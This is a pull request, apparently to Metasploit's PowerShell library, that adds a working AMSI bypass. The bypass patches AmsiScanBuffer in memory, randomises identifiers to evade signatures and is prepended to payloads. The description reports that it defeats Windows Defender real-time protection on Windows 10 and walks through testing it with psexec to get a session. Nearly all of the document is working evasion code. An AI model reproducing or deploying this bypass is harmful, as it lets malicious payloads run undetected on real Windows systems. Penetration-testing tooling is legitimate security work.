### PR TITLE
Add an updated AMSI bypass

### DIFF
--- a/data/templates/amsi_bypass_1.ps1.template
+++ b/data/templates/amsi_bypass_1.ps1.template
@@ -1,33 +1,68 @@
-# AMSI Patch
-# Modified By: Shantanu Khandelwal (@shantanukhande)
-# Original Author: Paul Laîné (@am0nsec)
+# AMSI bypass via inline patching
 #
+# This code will bypass AMSI by patching the assembly instructions of amsi!AmsiScanBuffer. This technique has been
+# refined to:
+#     1. Find the address of amsi!AmsiScanBuffer in memory without invoking kernel32!GetProcAddress with an obviously
+#        malicious string.
+#     2. Utilize VirtualQuery to ensure the scanning does not go past the boundary of the page, ensuring it can be run
+#        multiple times without crashing.
+#
+# Original Author: Paul Laîné (@am0nsec)
+# Modified By:
+#   Shantanu Khandelwal (@shantanukhande)
+#   Spencer McIntyre (@zeroSteiner)
+# See:
+#     * https://www.contextis.com/en/blog/amsi-bypass
+#     * https://gist.github.com/shantanu561993/6483e524dc225a188de04465c8512909
+#     * https://www.redteam.cafe/red-team/powershell/using-reflection-for-amsi-bypass
 
 Class %{cls_Hunter} {
     static [IntPtr] %{mth_FindAddress}([IntPtr]$%{var_address}, [byte[]]$%{var_egg}) {
-        while ($true) {
-            [int]$%{var_count} = 0;
+        $%{var_meminfo} = New-Object byte[](48);
+        $%{var_VirtualQueryAddr} = %{func_get_proc_address} kernel32.dll VirtualQuery;
+        $%{var_VirtualQueryDelegate} = %{func_get_delegate_type} @([IntPtr], [Byte[]], [Int]) ([Int]);
+        $%{var_VirtualQuery} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($%{var_VirtualQueryAddr}, $%{var_VirtualQueryDelegate});
 
-            while ($true) {
-                [IntPtr]$%{var_address} = [IntPtr]::Add($%{var_address}, 1);
-                If ([System.Runtime.InteropServices.Marshal]::ReadByte($%{var_address}) -eq $%{var_egg}.Get($%{var_count})) {
-                    $%{var_count}++;
-                    If ($%{var_count} -eq $%{var_egg}.Length) {
-                        return [IntPtr]::Subtract($%{var_address}, $%{var_egg}.Length - 1);
-                    }
-                } Else { break }
-            }
+        $%{var_VirtualQuery}.Invoke($%{var_address}, $%{var_meminfo}, $%{var_meminfo}.Length);
+
+        If ([IntPtr]::Size -eq 8) {
+            $%{var_address_cursor} = $%{var_address}.ToInt64();
+            $%{var_address_end} = [BitConverter]::ToInt64($%{var_meminfo}, 0) + [BitConverter]::ToInt64($%{var_meminfo}, 24);
+        }
+        Else {
+            $%{var_address_cursor} = $%{var_address}.ToInt32();
+            $%{var_address_end} = [BitConverter]::ToInt32($%{var_meminfo}, 0) + [BitConverter]::ToInt32($%{var_meminfo}, 16);
         }
 
-        return $%{var_address};
+        while ($%{var_address_cursor} -lt $%{var_address_end}) {
+            [int]$%{var_count} = 0;
+
+            while ($%{var_address_cursor} -lt $%{var_address_end}) {
+                $%{var_address_cursor} += 1;
+                If ([System.Runtime.InteropServices.Marshal]::ReadByte([IntPtr]::New($%{var_address_cursor})) -eq $%{var_egg}.Get($%{var_count})) {
+                    $%{var_count}++;
+                    If ($%{var_count} -eq $%{var_egg}.Length) {
+                        return $%{var_address_cursor} - $%{var_egg}.Length - 1;
+                    }
+                }
+                Else {
+                    break;
+                }
+            }
+        }
+        return [IntPtr]::Zero;
     }
 }
+
+
 function %{func_get_proc_address} {
     Param ($%{var_module}, $%{var_procedure});
     $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods');
 
     return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}));
 }
+
+
 function %{func_get_delegate_type} {
     Param (
         [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
@@ -40,6 +75,8 @@ function %{func_get_delegate_type} {
 
     return $%{var_type_builder}.CreateType();
 }
+
+
 $%{var_LoadLibraryAddr} = %{func_get_proc_address} kernel32.dll LoadLibraryA;
 $%{var_LoadLibraryDelegate} = %{func_get_delegate_type} @([String]) ([IntPtr]);
 $%{var_LoadLibrary} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($%{var_LoadLibraryAddr}, $%{var_LoadLibraryDelegate});
@@ -47,7 +84,7 @@ $%{var_GetProcAddressAddr} = %{func_get_proc_address} kernel32.dll GetProcAddres
 $%{var_GetProcAddressDelegate} = %{func_get_delegate_type} @([IntPtr], [String]) ([IntPtr]);
 $%{var_GetProcAddress} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($%{var_GetProcAddressAddr}, $%{var_GetProcAddressDelegate});
 $%{var_VirtualProtectAddr} = %{func_get_proc_address} kernel32.dll VirtualProtect;
-$%{var_VirtualProtectDelegate} =  %{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]);
+$%{var_VirtualProtectDelegate} = %{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]);
 $%{var_VirtualProtect} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($%{var_VirtualProtectAddr}, $%{var_VirtualProtectDelegate});
 
 
@@ -95,18 +132,20 @@ $%{var_hModule} = $%{var_LoadLibrary}.Invoke("amsi.dll");
 $%{var_DllGetClassObjectAddress} = $%{var_GetProcAddress}.Invoke($%{var_hModule}, "DllGetClassObject");
 # Write-Host "[+] DllGetClassObject address: $%{var_DllGetClassObjectAddress}";
 [IntPtr]$%{var_targetedAddress} = [%{cls_Hunter}]::%{mth_FindAddress}($%{var_DllGetClassObjectAddress}, $%{var_egg});
-# Write-Host "[+] Targeted address: $%{var_targetedAddress}";
 
-$%{var_oldProtectionBuffer} = 0;
-$%{var_VirtualProtect}.Invoke($%{var_targetedAddress}, [uint32]2, 4, [ref]$%{var_oldProtectionBuffer}) | Out-Null;
+If ($%{var_targetedAddress} -ne [IntPtr]::Zero) {
+    # Write-Host "[+] Targeted address: $%{var_targetedAddress}";
+    $%{var_oldProtectionBuffer1} = 0;
+    $%{var_VirtualProtect}.Invoke($%{var_targetedAddress}, [uint32]2, 4, [ref]$%{var_oldProtectionBuffer1}) | Out-Null;
 
-$patch = [byte[]] (
-    # xor rax, rax
-    0x31, 0xC0,
-    # ret
-    0xC3
-);
-[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $%{var_targetedAddress}, 3);
+    $patch = [byte[]] (
+        # xor rax, rax
+        0x31, 0xC0,
+        # ret
+        0xC3
+    );
+    [System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $%{var_targetedAddress}, 3);
 
-$a = 0;
-$%{var_VirtualProtect}.Invoke($%{var_targetedAddress}, [uint32]2, $%{var_oldProtectionBuffer}, [ref]$a) | Out-Null;
+    $%{var_oldProtectionBuffer2} = 0;
+    $%{var_VirtualProtect}.Invoke($%{var_targetedAddress}, [uint32]2, $%{var_oldProtectionBuffer1}, [ref]$%{var_oldProtectionBuffer2}) | Out-Null;
+}

--- a/data/templates/amsi_bypass_1.ps1.template
+++ b/data/templates/amsi_bypass_1.ps1.template
@@ -31,7 +31,7 @@ Class %{cls_Hunter} {
         }
         Else {
             $%{var_address_cursor} = $%{var_address}.ToInt32();
-            $%{var_address_end} = [BitConverter]::ToInt32($%{var_meminfo}, 0) + [BitConverter]::ToInt32($%{var_meminfo}, 16);
+            $%{var_address_end} = [BitConverter]::ToInt32($%{var_meminfo}, 0) + [BitConverter]::ToInt32($%{var_meminfo}, 12);
         }
 
         while ($%{var_address_cursor} -lt $%{var_address_end}) {

--- a/data/templates/amsi_bypass_1.ps1.template
+++ b/data/templates/amsi_bypass_1.ps1.template
@@ -3,85 +3,57 @@
 # Original Author: Paul Laîné (@am0nsec)
 #
 
-Class Hunter {
-    static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {
+Class %{cls_Hunter} {
+    static [IntPtr] %{mth_FindAddress}([IntPtr]$%{var_address}, [byte[]]$%{var_egg}) {
         while ($true) {
-            [int]$count = 0;
+            [int]$%{var_count} = 0;
 
             while ($true) {
-                [IntPtr]$address = [IntPtr]::Add($address, 1);
-                If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {
-                    $count++;
-                    If ($count -eq $egg.Length) {
-                        return [IntPtr]::Subtract($address, $egg.Length - 1);
+                [IntPtr]$%{var_address} = [IntPtr]::Add($%{var_address}, 1);
+                If ([System.Runtime.InteropServices.Marshal]::ReadByte($%{var_address}) -eq $%{var_egg}.Get($%{var_count})) {
+                    $%{var_count}++;
+                    If ($%{var_count} -eq $%{var_egg}.Length) {
+                        return [IntPtr]::Subtract($%{var_address}, $%{var_egg}.Length - 1);
                     }
                 } Else { break }
             }
         }
 
-        return $address;
+        return $%{var_address};
     }
 }
-function Get-ProcAddress {
-    Param(
-        [Parameter(Position = 0, Mandatory = $True)] [String] $Module,
-        [Parameter(Position = 1, Mandatory = $True)] [String] $Procedure
+function %{func_get_proc_address} {
+    Param ($%{var_module}, $%{var_procedure});
+    $%{var_unsafe_native_methods} = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods');
+
+    return $%{var_unsafe_native_methods}.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($%{var_unsafe_native_methods}.GetMethod('GetModuleHandle')).Invoke($null, @($%{var_module})))), $%{var_procedure}));
+}
+function %{func_get_delegate_type} {
+    Param (
+        [Parameter(Position = 0, Mandatory = $True)] [Type[]] $%{var_parameters},
+        [Parameter(Position = 1)] [Type] $%{var_return_type} = [Void]
     );
 
-    # Get a reference to System.dll in the GAC
-    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') };
-    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods');
-    # Get a reference to the GetModuleHandle and GetProcAddress methods
-    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle');
-    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]));
-    # Get a handle to the module specified
-    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module));
-    $tmpPtr = New-Object IntPtr;
-    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle);
-    # Return the address of the function
-    return $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure));
+    $%{var_type_builder} = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
+    $%{var_type_builder}.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $%{var_parameters}).SetImplementationFlags('Runtime, Managed');
+    $%{var_type_builder}.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $%{var_return_type}, $%{var_parameters}).SetImplementationFlags('Runtime, Managed');
+
+    return $%{var_type_builder}.CreateType();
 }
-function Get-DelegateType
-{
-    Param
-    (
-        [OutputType([Type])]
-
-        [Parameter( Position = 0)]
-        [Type[]]
-        $Parameters = (New-Object Type[](0)),
-
-        [Parameter( Position = 1 )]
-        [Type]
-        $ReturnType = [Void]
-    );
-
-    $Domain = [AppDomain]::CurrentDomain;
-    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate');
-    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);
-    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false);
-    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
-    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters);
-    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed');
-    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters);
-    $MethodBuilder.SetImplementationFlags('Runtime, Managed');
-
-    Write-Output $TypeBuilder.CreateType();
-}
-$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA;
-$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]);
-$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate);
-$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress;
-$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]);
-$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate);
-$VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect;
-$VirtualProtectDelegate =  Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]);
-$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate);
+$%{var_LoadLibraryAddr} = %{func_get_proc_address} kernel32.dll LoadLibraryA;
+$%{var_LoadLibraryDelegate} = %{func_get_delegate_type} @([String]) ([IntPtr]);
+$%{var_LoadLibrary} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($%{var_LoadLibraryAddr}, $%{var_LoadLibraryDelegate});
+$%{var_GetProcAddressAddr} = %{func_get_proc_address} kernel32.dll GetProcAddress;
+$%{var_GetProcAddressDelegate} = %{func_get_delegate_type} @([IntPtr], [String]) ([IntPtr]);
+$%{var_GetProcAddress} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($%{var_GetProcAddressAddr}, $%{var_GetProcAddressDelegate});
+$%{var_VirtualProtectAddr} = %{func_get_proc_address} kernel32.dll VirtualProtect;
+$%{var_VirtualProtectDelegate} =  %{func_get_delegate_type} @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]);
+$%{var_VirtualProtect} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($%{var_VirtualProtectAddr}, $%{var_VirtualProtectDelegate});
 
 
 If ([IntPtr]::Size -eq 8) {
     # Write-Host "[+] 64-bits process";
-    [byte[]]$egg = [byte[]] (
+    [byte[]]$%{var_egg} = [byte[]] (
         # mov     r11,rsp
         0x4C, 0x8B, 0xDC,
         # mov     qword ptr [r11+8],rbx
@@ -101,7 +73,7 @@ If ([IntPtr]::Size -eq 8) {
     );
 } Else {
     # Write-Host "[+] 32-bits process";
-    [byte[]]$egg = [byte[]] (
+    [byte[]]$%{var_egg} = [byte[]] (
         # mov     edi,edi
         0x8B, 0xFF,
         # push    ebp
@@ -118,15 +90,15 @@ If ([IntPtr]::Size -eq 8) {
 }
 
 
-$hModule = $LoadLibrary.Invoke("amsi.dll");
-# Write-Host "[+] AMSI DLL Handle: $hModule";
-$DllGetClassObjectAddress = $GetProcAddress.Invoke($hModule, "DllGetClassObject");
-# Write-Host "[+] DllGetClassObject address: $DllGetClassObjectAddress";
-[IntPtr]$targetedAddress = [Hunter]::FindAddress($DllGetClassObjectAddress, $egg);
-# Write-Host "[+] Targeted address: $targetedAddress";
+$%{var_hModule} = $%{var_LoadLibrary}.Invoke("amsi.dll");
+# Write-Host "[+] AMSI DLL Handle: $%{var_hModule}";
+$%{var_DllGetClassObjectAddress} = $%{var_GetProcAddress}.Invoke($%{var_hModule}, "DllGetClassObject");
+# Write-Host "[+] DllGetClassObject address: $%{var_DllGetClassObjectAddress}";
+[IntPtr]$%{var_targetedAddress} = [%{cls_Hunter}]::%{mth_FindAddress}($%{var_DllGetClassObjectAddress}, $%{var_egg});
+# Write-Host "[+] Targeted address: $%{var_targetedAddress}";
 
-$oldProtectionBuffer = 0;
-$VirtualProtect.Invoke($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null;
+$%{var_oldProtectionBuffer} = 0;
+$%{var_VirtualProtect}.Invoke($%{var_targetedAddress}, [uint32]2, 4, [ref]$%{var_oldProtectionBuffer}) | Out-Null;
 
 $patch = [byte[]] (
     # xor rax, rax
@@ -134,7 +106,7 @@ $patch = [byte[]] (
     # ret
     0xC3
 );
-[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3);
+[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $%{var_targetedAddress}, 3);
 
 $a = 0;
-$VirtualProtect.Invoke($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null;
+$%{var_VirtualProtect}.Invoke($%{var_targetedAddress}, [uint32]2, $%{var_oldProtectionBuffer}, [ref]$a) | Out-Null;

--- a/data/templates/amsi_bypass_1.ps1.template
+++ b/data/templates/amsi_bypass_1.ps1.template
@@ -1,0 +1,140 @@
+# AMSI Patch
+# Modified By: Shantanu Khandelwal (@shantanukhande)
+# Original Author: Paul Laîné (@am0nsec)
+#
+
+Class Hunter {
+    static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {
+        while ($true) {
+            [int]$count = 0;
+
+            while ($true) {
+                [IntPtr]$address = [IntPtr]::Add($address, 1);
+                If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {
+                    $count++;
+                    If ($count -eq $egg.Length) {
+                        return [IntPtr]::Subtract($address, $egg.Length - 1);
+                    }
+                } Else { break }
+            }
+        }
+
+        return $address;
+    }
+}
+function Get-ProcAddress {
+    Param(
+        [Parameter(Position = 0, Mandatory = $True)] [String] $Module,
+        [Parameter(Position = 1, Mandatory = $True)] [String] $Procedure
+    );
+
+    # Get a reference to System.dll in the GAC
+    $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') };
+    $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods');
+    # Get a reference to the GetModuleHandle and GetProcAddress methods
+    $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle');
+    $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]));
+    # Get a handle to the module specified
+    $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module));
+    $tmpPtr = New-Object IntPtr;
+    $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle);
+    # Return the address of the function
+    return $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure));
+}
+function Get-DelegateType
+{
+    Param
+    (
+        [OutputType([Type])]
+
+        [Parameter( Position = 0)]
+        [Type[]]
+        $Parameters = (New-Object Type[](0)),
+
+        [Parameter( Position = 1 )]
+        [Type]
+        $ReturnType = [Void]
+    );
+
+    $Domain = [AppDomain]::CurrentDomain;
+    $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate');
+    $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run);
+    $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false);
+    $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]);
+    $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters);
+    $ConstructorBuilder.SetImplementationFlags('Runtime, Managed');
+    $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters);
+    $MethodBuilder.SetImplementationFlags('Runtime, Managed');
+
+    Write-Output $TypeBuilder.CreateType();
+}
+$LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA;
+$LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr]);
+$LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate);
+$GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress;
+$GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr]);
+$GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate);
+$VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect;
+$VirtualProtectDelegate =  Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool]);
+$VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate);
+
+
+If ([IntPtr]::Size -eq 8) {
+    # Write-Host "[+] 64-bits process";
+    [byte[]]$egg = [byte[]] (
+        # mov     r11,rsp
+        0x4C, 0x8B, 0xDC,
+        # mov     qword ptr [r11+8],rbx
+        0x49, 0x89, 0x5B, 0x08,
+        # mov     qword ptr [r11+10h],rbp
+        0x49, 0x89, 0x6B, 0x10,
+        # mov     qword ptr [r11+18h],rsi
+        0x49, 0x89, 0x73, 0x18,
+        # push    rdi
+        0x57,
+        # push    r14
+        0x41, 0x56,
+        # push    r15
+        0x41, 0x57,
+        # sub     rsp,70h
+        0x48, 0x83, 0xEC, 0x70
+    );
+} Else {
+    # Write-Host "[+] 32-bits process";
+    [byte[]]$egg = [byte[]] (
+        # mov     edi,edi
+        0x8B, 0xFF,
+        # push    ebp
+        0x55,
+        # mov     ebp,esp
+        0x8B, 0xEC,
+        # sub     esp,18h
+        0x83, 0xEC, 0x18,
+        # push    ebx
+        0x53,
+        # push    esi
+        0x56
+    );
+}
+
+
+$hModule = $LoadLibrary.Invoke("amsi.dll");
+# Write-Host "[+] AMSI DLL Handle: $hModule";
+$DllGetClassObjectAddress = $GetProcAddress.Invoke($hModule, "DllGetClassObject");
+# Write-Host "[+] DllGetClassObject address: $DllGetClassObjectAddress";
+[IntPtr]$targetedAddress = [Hunter]::FindAddress($DllGetClassObjectAddress, $egg);
+# Write-Host "[+] Targeted address: $targetedAddress";
+
+$oldProtectionBuffer = 0;
+$VirtualProtect.Invoke($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null;
+
+$patch = [byte[]] (
+    # xor rax, rax
+    0x31, 0xC0,
+    # ret
+    0xC3
+);
+[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3);
+
+$a = 0;
+$VirtualProtect.Invoke($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null;

--- a/data/templates/to_mem_rc4.ps1.template
+++ b/data/templates/to_mem_rc4.ps1.template
@@ -1,7 +1,7 @@
 function %{func_rc4_decrypt} {
     param([Byte[]]$%{var_rc4buffer})
 
-	$%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
+    $%{var_key} = ([system.Text.Encoding]::UTF8).GetBytes("%{random_key}")
 
     $s = New-Object Byte[] 256;
     $k = New-Object Byte[] 256;

--- a/lib/rex/powershell/command.rb
+++ b/lib/rex/powershell/command.rb
@@ -325,6 +325,7 @@ EOS
 
     if opts[:prepend_protections_bypass]
       bypass_amsi = Rex::Powershell::PshMethods.bypass_powershell_protections
+      bypass_amsi = compress_script(bypass_amsi, nil, opts)
       compressed_payload = bypass_amsi + ";" + compressed_payload
     end
 

--- a/lib/rex/powershell/psh_methods.rb
+++ b/lib/rex/powershell/psh_methods.rb
@@ -18,7 +18,6 @@ module Powershell
       target ||= '$pwd\\' << src.split('/').last
       %Q^(new-object System.Net.WebClient).DownloadFile('#{src}', '#{target}')^
     end
-
     #
     # Download file via .NET WebClient and execute it afterwards
     #
@@ -86,14 +85,15 @@ module Powershell
     end
 
     #
-    # Return mattifestation's AMSI bypass
+    # Return an AMSI bypass
     #
     # @return [String] PowerShell code to bypass AMSI
     def self.bypass_amsi()
-      %q{
-        $Ref=[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils');
-        $Ref.GetField('amsiIn'+'itFailed','NonPublic,Static').SetValue($null,$true);
-      }
+      template_pathname = File.join(Rex::Powershell::Templates::TEMPLATE_DIR, 'amsi_bypass_1.ps1.template')
+      script = Rex::Powershell::Script.new(File.read(template_pathname))
+      script.strip_comments
+      script.strip_whitespace
+      script.code
     end
 
     #

--- a/lib/rex/powershell/psh_methods.rb
+++ b/lib/rex/powershell/psh_methods.rb
@@ -90,10 +90,15 @@ module Powershell
     # @return [String] PowerShell code to bypass AMSI
     def self.bypass_amsi()
       template_pathname = File.join(Rex::Powershell::Templates::TEMPLATE_DIR, 'amsi_bypass_1.ps1.template')
-      script = Rex::Powershell::Script.new(File.read(template_pathname))
+      template = File.read(template_pathname)
+      rig = Rex::RandomIdentifier::Generator.new(Rex::Powershell::Templates::DEFAULT_RIG_OPTS)
+      template.scan(/%{((cls|func|mth|var)_\w+)/).map{|m| m[0].to_sym }.uniq.sort.each do |var|
+        rig.init_var(var)
+      end
+      script = Rex::Powershell::Script.new(template)
       script.strip_comments
       script.strip_whitespace
-      script.code
+      script.code % rig.to_h
     end
 
     #


### PR DESCRIPTION
This is a draft PR that includes an updated AMSI bypass that I've confirmed works on Windows 10. The code for the bypass is from [here](https://www.redteam.cafe/red-team/powershell/using-reflection-for-amsi-bypass) and uses reflection to avoid writing anything to disk and invoking csc.exe. AFAIK this is the latest and greatest technique.

## Testing Steps

- [ ] Use Metasploit's psexec module
- [ ] Set `Powershell::prepend_protections_bypass true`
- [ ] Run the module against a Windows 10 system with Defender enabled and real-time protection on
- [ ] Get a session established (it may die later, but after a few seconds and that's a different problem)
- [ ] Set `Powershell::prepend_protections_bypass false`
- [ ] Run the module again, and do not get a session

I also tested this with the `web_delivery` module and it works there as well so long as the prepend_protections_bypass option is enabled.

## To do:

- [x] Obfuscate the code by substituting all of the variables.
- [ ] Test this on older versions of Windows, make sure nothing breaks.
- [ ] Determine whether or not the old AMSI bypass technique still needs to be included. We can leave it out if this technique reliably works on a superset of environments where the old technique was applicable.
- [x] Fix a bug where if the bypass is executed more than once in the same powershell instance, powershell will crash.